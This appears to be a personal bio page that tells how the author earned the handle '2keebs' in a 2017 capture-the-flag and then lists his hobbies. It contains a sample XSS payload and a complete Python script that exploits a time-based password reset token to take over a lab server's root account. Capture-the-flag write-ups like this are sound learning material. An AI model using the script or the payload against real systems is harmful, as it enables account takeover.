corporate
I am someone who did not realise that you could make a career out of typing "><script>alert('how good is xss aye?');</script> (an oversimplification, but you get the point), until I ran into some friendly folk over at UTS Cyber Security Society. From there I partook in the Cyber Security Challenge Australia (CySCA) 2017, and well - the rest as they say is history.
the story of how i got the handle “2keebs”
The year was 2017, I was a fresh uni student who had somehow found his way into competing in a competition called “Cyber Security Challenge Australia” (CySCA).This was my first ever Capture The Flag (CTF) competition, and was very, very new to the world of cyber security. Due to the actions and method I used to solve one of the challenges, I gained the handle “2keebs” - which stands for 2 keyboards (a keeb is an affectionate term given to a keyboard).
the challenge itself
If you wish to, you can find the full writeup for the challenge on the official CySCA website. This is the tl;dr version.
Resetting the password for the normal user, involved calling an API, requesting for a password reset token. This token I soon discovered was being generated based on time, which meant that if I called the API for both the normal user and the admin account at the same exact time, they would have the same reset token. This would allow me to reset the password for the admin account, by changing it for the normal user.
Now someone who knew what they were doing would’ve made a script like this:
import requests
import coloredlogs
import logging
coloredlogs.install(level = 'DEBUG')
SERVER_IP = "10.13.37.210:8002"
should_register = raw_input("Should I register an account? [y/n]: ")
if should_register == "y":
register = requests.get("http://%s/api/public/user/register" % SERVER_IP, data = {
'username': 'hacker',
'password': 'hacker01',
'phonenr': '0400137137'
})
logging.debug(register.text)
root_reset_token = requests.get('http://%s/api/public/user/getResetToken' % SERVER_IP, data = { 'username': 'root'})
my_reset_token = requests.get('http://%s/api/public/user/getResetToken' % SERVER_IP, data = {'username': 'hacker'})
logging.debug(root_reset_token.text)
logging.debug(my_reset_token.text)
logging.info("[+] Reset token should have been sent to your phone (cli.bin)")
reset_token = raw_input("Please provide your reset token: ")
reset_password = requests.get('http://%s/api/public/user/resetPassword' % SERVER_IP, data = {
'username': 'root',
'token': reset_token,
'newPassword': 'yolo',
'confirmNewPassword': 'yolo'
})
logging.info("[+] The password for 'root' should now be 'yolo'")
result = requests.get('http://%s/api/private/user/parcels' % SERVER_IP, {
'username': 'root',
'password': 'yolo'
})
logging.info(result.text)
logging.info('[+] Python scriptttt OUT!')
Being the fresh first year student that I was, I had absolutely no idea whatsoever on how to make a script like that. I knew it was possible, just not how. Under normal circumstances I would have taken the time to learn the request module, and understood how to make the above script. But, this was no ordinary situation.
Time was ticking. Points were being gained by the opposition. The challenge was yet to be solved. I wanted to be the first.
Using big brain strategy, I asked my mate if I could borrow his machine for a bit. I used curl on both our devices to call the API at the same time, in true Hackerman style (or if you’re more modern CSI: Cyber), I spammed the enter key on both our machines until the time matched up exactly (down to the seconds) in order to get the same rest token.
Admin was mine!
During our post-competition feed, a member from another team remembered my antics and brought it up as:
“hey you’re that 2 keyboards guy”
And so my handle from then on became 2keebs. Soon after, on a unrelated (or perhaps not so unrelated) note, my mechanical keyboard addiction began.
individual
Outside of security I am a hobby collector. As such I tend to find myself absorbed in one of the following hobbies:
- photography (ig: @2keebs)
- gym (deadlifts > all other lifts)`
- fashion (or so i like to think)
- motorbikes (2015 MT-07)
the keyboards
- Happy Hacking Keyboard Professional Hybrid
- Despite the handle 2keebs, I currently only have one keyboard. Talk about false advertisement, amirite?